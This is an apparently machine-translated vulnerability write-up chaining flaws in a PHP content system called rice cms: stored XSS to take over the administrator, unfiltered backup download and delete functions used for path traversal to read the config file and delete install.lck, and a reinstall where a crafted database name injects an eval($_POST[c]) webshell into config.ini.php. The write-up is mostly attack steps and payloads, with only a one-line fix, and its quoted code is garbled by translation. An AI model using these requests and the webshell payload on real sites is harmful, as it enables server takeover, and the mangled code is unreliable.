Multiple vulnerabilities in rice cms combined into shell

Multiple vulnerabilities in rice cms combined into shell

First, let's talk about his xss.

Almost no filtering. (Register an account and modify user information)

Register an account first.
 

After the registration is successful, we will not care.

Wait for the Administrator to go to the background to view member information.
 

 

In this way, you can log on to the administrator account.


Download and delete any file.
 

Back up the database first (the database name is regular and can be cracked. Year, month, and day _ 4-digit random number _ 1. SQL)
 

Let's check the connection for downloading and deleting files.



? M = Backup & a = del & id = 20140817_9550_1. SQL

? M = Backup & a = down & id = 20140817_9550_1. SQL



Then I found the two functions.
 

// Download and restore public function down () {$ filepath = '. /Public/Backup /'. $ _ GET ['id']; if (file_exists ($ filepath) {$ filename = $ filename? $ Filename: basename ($ filepath); $ filetype = trim (substr (strrchr ($ filename ,'. '), 1); $ filesize = filesize ($ filepath); header ('cache-control: max-age = 31536000'); header ('expires :'. gmdate ('d, d m y h: I: s', time () + 31536000 ). 'gmt'); header ('content-Encoding: none'); header ('content-Length :'. $ filesize); header ('content-Disposition: attachment; filename = '. $ filename); header ('content-Type :'. $ filetype); re Adfile ($ filepath); exit;} else {$ this-> error ('error. The volume file is not found! ') ;}} // Delete the volume partition file public function del () {$ filename = trim ($ _ GET ['id']); @ unlink ('. /Public/Backup /'. $ filename); $ this-> assign ("jumpUrl", U ("Backup/restore"); $ this-> success ($ filename. 'deleted! ');}

Neither function is filtered.

Let's download the database configuration file.
 

http://localhost/admin.php?m=Backup&a=down&id=../Config/config.ini.php

After checking, we delete install. lck.
 

http://localhost/admin.php?m=Backup&a=del&id=../../install.lck

Then we will be prompted that install. lck has been deleted.



By re-installing cms, you can write shell.
 

// Modify the configuration file $ fp = fopen ($ source_file, "r"); $ configStr = fread ($ fp, filesize ($ source_file); fclose ($ fp ); $ configStr = str_replace ('localhost', $ dbhost, $ configStr); $ configStr = str_replace ('damidb', $ dbname, $ configStr ); $ configStr = str_replace ("'db _ user' => 'admin'", "'db _ user' => '{$ dbuser}'", $ configStr ); $ configStr = str_replace ("'db _ pwd' => 'admin'", "'db _ pwd' => '{$ dbpwd}'", $ configStr ); if ($ dbport! = '000000') {$ configStr = str_replace ("'db _ port' => '000000'", "'db _ port' => '{$ dbport }'", $ configStr) ;}$ fp = fopen ($ target_file, "w") or die ("<script> alert ('write configuration failed. Check whether $ target_file can be written! '); History. go (-1); </script> "); fwrite ($ fp, $ configStr); fclose ($ fp );

$ Source_file is a template configuration file saved for its cms,
 

Database Name

Damicms ', 1 => eval ($ _ POST [c]), 'xx' =>'
 

Effect

\ Public \ Config \ config. ini. php
 

 

 

Solution: enhanced Filtering